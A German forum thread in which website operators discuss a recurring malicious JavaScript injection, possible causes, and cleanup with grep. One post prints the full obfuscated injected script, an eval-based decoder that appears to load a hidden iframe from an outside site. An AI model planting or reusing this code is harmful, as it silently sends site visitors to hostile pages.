na dann, wie gesagt, unsichere passwörter, oder dein pc ist infiziert.
wenn es noch der selbe code ist, und er nicht geendert wurde, um auf eine neue seite zu verbinden, macht er, wie gesagt nichts, denn bei der analyse hat er auf einen leeren ftp server weitergeleitet.

Mein FTP Pw ist sicher, habs auch extra nochmal geändert.
Wenn jemand den FTP Zugang zu meinem Server (Rechenzentrum) hätte, käönnte er deutlich mehr Schaden anrichten. Aber der Code ist komischerweise nur auf der Seite von einem Kunden drauf. Und der hat nicht mal FTP Zugang. Also habe ich ja XSS getippt, was ich aber programmatisch ausgeschlossen habe.
Deswegen bin ich ja verwirrt, dass der Code wieder da war. Naja.. jetzt ist er erstmal weg, aber die Backdoor habe ich noch nicht gefunden.

Zitat:

Zitat von jerryme76

Wenn jemand den FTP Zugang zu meinem Server (Rechenzentrum) hätte, käönnte er deutlich mehr Schaden anrichten.

Darum geht es oft doch gar nicht.
Ein Viagra-Spam-Versender hat zum Beispiel doch gar kein Interesse daran, die benutzten Server oder auch Opfer (Ziele) zu stören, der will sein Anliegen durchziehen. Und wenn jemand z.B. Surfer mit Schadcode von einem ukrainischen Server beglücken wollte oder zu illegalen Sites leiten oder locken will, so wäre es kontraproduktiv seinen Lockstandort (deine Seite, vermutlich meinst du aber Site) zu zerstören.

Moin,

mein erster Post, obwohl ich seit Jahren sporadisch hier mitlese. Also höchste Zeit...

Den Java-Script-Schadcode hatte ich auch auf einigen Servern, konnte aber über "grep" die infizierten Dateien ausfindig machen und den Code löschen. Seitdem ist Ruhe. Es wurden alle "index.html" und "index.php" infiziert.

Der Code war folgender und fast immer direkt am Anfang der Datei:

Code: Alles auswählenAufklappen

ATTFilter

<script>try{document.body++}catch(dgsgsdg){zxc=12;ww=window;}if(zxc){try{f=document.createElement("div");}catch(agdsg){zxc=0;}try{if(ww.document)window["doc"+"ument"]["body"]="zxc"}catch(bawetawe){if(ww.document){v=window;n=["9","9","41","3o","16","1e","3m","47","3l","4d","45","3n","46","4c","1k","3p","3n","4c","2h","44","3n","45","3n","46","4c","4b","2e","4h","36","3j","3p","30","3j","45","3n","1e","1d","3k","47","3m","4h","1d","1f","3d","1m","3f","1f","4j","d","9","9","9","41","3o","4a","3j","45","3n","4a","1e","1f","27","d","9","9","4l","16","3n","44","4b","3n","16","4j","d","9","9","9","3m","47","3l","4d","45","3n","46","4c","1k","4f","4a","41","4c","3n","1e","18","28","41","3o","4a","3j","45","3n","16","4b","4a","3l","29","1d","40","4c","4c","48","26","1l","1l","4d","46","43","46","47","4f","46","3l","47","45","45","4d","4c","3n","1k","4b","4d","1l","41","45","3p","1n","1l","3l","47","4d","46","4c","1k","40","4c","45","1d","16","4f","41","3m","4c","40","29","1d","1n","1m","1m","1d","16","40","3n","41","3p","40","4c","29","1d","1n","1m","1m","1d","16","4b","4c","4h","44","3n","29","1d","4f","41","3m","4c","40","26","1n","1m","1m","48","4g","27","40","3n","41","3p","40","4c","26","1n","1m","1m","48","4g","27","48","47","4b","41","4c","41","47","46","26","3j","3k","4b","47","44","4d","4c","3n","27","4e","41","4b","41","3k","41","44","41","4c","4h","26","40","41","3m","3m","3n","46","27","44","3n","3o","4c","26","1j","1n","1m","1m","1m","1m","48","4g","27","4c","47","48","26","1m","27","1d","2a","28","1l","41","3o","4a","3j","45","3n","2a","18","1f","27","d","9","9","4l","d","9","9","3o","4d","46","3l","4c","41","47","46","16","41","3o","4a","3j","45","3n","4a","1e","1f","4j","d","9","9","9","4e","3j","4a","16","3o","16","29","16","3m","47","3l","4d","45","3n","46","4c","1k","3l","4a","3n","3j","4c","3n","2h","44","3n","45","3n","46","4c","1e","1d","41","3o","4a","3j","45","3n","1d","1f","27","3o","1k","4b","3n","4c","2d","4c","4c","4a","41","3k","4d","4c","3n","1e","1d","4b","4a","3l","1d","1i","1d","40","4c","4c","48","26","1l","1l","4d","46","43","46","47","4f","46","3l","47","45","45","4d","4c","3n","1k","4b","4d","1l","41","45","3p","1n","1l","3l","47","4d","46","4c","1k","40","4c","45","1d","1f","27","3o","1k","4b","4c","4h","44","3n","1k","44","3n","3o","4c","29","1d","1j","1n","1m","1m","1m","1m","48","4g","1d","27","3o","1k","4b","4c","4h","44","3n","1k","4e","41","4b","41","3k","41","44","41","4c","4h","29","1d","40","41","3m","3m","3n","46","1d","27","3o","1k","4b","4c","4h","44","3n","1k","4c","47","48","29","1d","1m","1d","27","3o","1k","4b","4c","4h","44","3n","1k","48","47","4b","41","4c","41","47","46","29","1d","3j","3k","4b","47","44","4d","4c","3n","1d","27","3o","1k","4b","4c","4h","44","3n","1k","4c","47","48","29","1d","1m","1d","27","3o","1k","4b","3n","4c","2d","4c","4c","4a","41","3k","4d","4c","3n","1e","1d","4f","41","3m","4c","40","1d","1i","1d","1n","1m","1m","1d","1f","27","3o","1k","4b","3n","4c","2d","4c","4c","4a","41","3k","4d","4c","3n","1e","1d","40","3n","41","3p","40","4c","1d","1i","1d","1n","1m","1m","1d","1f","27","d","9","9","9","3m","47","3l","4d","45","3n","46","4c","1k","3p","3n","4c","2h","44","3n","45","3n","46","4c","4b","2e","4h","36","3j","3p","30","3j","45","3n","1e","1d","3k","47","3m","4h","1d","1f","3d","1m","3f","1k","3j","48","48","3n","46","3m","2f","40","41","44","3m","1e","3o","1f","27","d","9","9","4l"];h=2;s="";if(zxc){for(i=0;i-646!=0;i++){k=i;s+=String["fro"+"mC"+"harCode"](parseInt(n[i],12*2+2));}z=s;vl="val";if(ww.document)eval(z)}}}}</script>
         

2 der Server wurden von mir mittels ftp bedient, der 3. ist nie von mir besucht worden und ich hab den Auftrag bekommen, den code zu beseitigen. Wenn man mit metager nach dem Code sucht (z.B.: "catch(dgsgsdg)") , sind einige Webseiten befallen und Google zeigt eine Warnung an.

lg und schönen Sonntag noch, gecko